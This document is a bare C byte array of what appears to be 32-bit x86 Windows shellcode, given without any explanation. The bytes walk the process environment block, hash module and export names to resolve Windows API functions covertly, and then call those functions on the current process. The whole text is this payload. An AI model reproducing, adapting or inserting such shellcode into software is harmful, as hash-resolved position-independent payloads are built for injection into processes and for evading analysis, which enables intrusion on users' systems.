unsigned char buf[] = 
"\x55\x89\xe5\xe8\x04\x00\x00\x00\x89\xec\x5d\xc3\x55\x89\xe5\x57"
"\x56\x31\xf6\x53\x83\xec\x3c\xc7\x04\x24\xf0\x1d\xd3\xad\xe8\x01"
"\x01\x00\x00\xc7\x04\x24\x53\x17\xe6\x70\x89\xc7\xe8\xf3\x00\x00"
"\x00\x89\xc3\x85\xff\x74\x12\xc7\x44\x24\x04\xda\xb3\xf1\x0d\x89"
"\x3c\x24\xe8\x24\x01\x00\x00\x89\xc6\x85\xdb\x74\x3c\x89\x1c\x24"
"\xc7\x44\x24\x04\x37\x8c\xc5\x3f\xe8\x0e\x01\x00\x00\x89\x45\xd4"
"\x89\x1c\x24\xc7\x44\x24\x04\xb2\x5a\x91\x4d\xe8\xfb\x00\x00\x00"
"\x89\x1c\x24\xc7\x44\x24\x04\x4d\xff\xa9\x27\x89\xc7\xe8\xe9\x00"
"\x00\x00\x8b\x55\xd4\x89\xc3\xeb\x06\x31\xdb\x31\xff\x31\xd2\x31"
"\xc0\x89\x45\xe4\x89\x44\x24\x0c\x89\x44\x24\x08\x8d\x45\xe4\xc7"
"\x44\x24\x04\xff\xff\xff\xff\x89\x04\x24\xff\xd2\x8b\x45\xe4\x83"
"\xec\x10\x89\x04\x24\xff\xd7\x52\x8b\x45\xe4\x89\x04\x24\xff\xd3"
"\x51\xc7\x44\x24\x04\x00\x10\x00\x00\xc7\x04\x24\xff\xff\xff\xff"
"\xff\xd6\x53\x53\x8d\x65\xf4\x5b\x5e\x5f\x5d\xc3\x55\xb8\x05\x15"
"\x00\x00\x89\xe5\x57\x56\x53\x8b\x5d\x08\x8b\x75\x0c\x89\xd9\x8a"
"\x11\x85\xf6\x75\x06\x84\xd2\x75\x11\xeb\x22\x89\xcf\x29\xdf\x39"
"\xf7\x73\x1a\x84\xd2\x75\x03\x41\xeb\x08\x80\xfa\x60\x76\x03\x83"
"\xea\x20\x6b\xc0\x21\x0f\xb6\xd2\x41\x01\xd0\xeb\xd2\x5b\x5e\x5f"
"\x5d\xc3\x90\x90\x55\x89\xe5\x56\x53\x83\xec\x10\x64\xa1\x30\x00"
"\x00\x00\x8b\x40\x0c\x8b\x70\x14\x89\xf3\x0f\xb7\x43\x24\x89\x44"
"\x24\x04\x8b\x43\x28\x89\x04\x24\xe8\x8f\xff\xff\xff\x3b\x45\x08"
"\x75\x05\x8b\x43\x10\xeb\x0d\x8b\x1b\x85\xdb\x74\x04\x39\xde\x75"
"\xd9\x83\xc8\xff\x83\xc4\x10\x5b\x5e\x5d\xc3\x55\x89\xe5\x57\x56"
"\x31\xf6\x53\x83\xec\x2c\x8b\x5d\x08\x8b\x43\x3c\x8b\x7c\x03\x78"
"\x01\xdf\x8b\x47\x20\x8b\x4f\x1c\x01\xd8\x89\x45\xe4\x8b\x47\x24"
"\x89\x45\xe0\x3b\x77\x18\x73\x39\x31\xc0\x89\x4d\xdc\x89\x44\x24"
"\x04\x8b\x55\xe4\x8b\x04\xb2\x01\xd8\x89\x04\x24\xe8\x2b\xff\xff"
"\xff\x3b\x45\x0c\x8b\x4d\xdc\x75\x15\x8b\x45\xe0\x01\xf6\x01\xc6"
"\x0f\xb7\x04\x1e\x8d\x04\x81\x03\x1c\x18\x89\xd8\xeb\x03\x46\xeb"
"\xc2\x83\xc4\x2c\x5b\x5e\x5f\x5d\xc3\x90\x90\x90\x66\x90\x66\x90"
"\xe8\x00\x00\x00\x00\x58\x83\xe8\x05\xc3\x66\x90\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
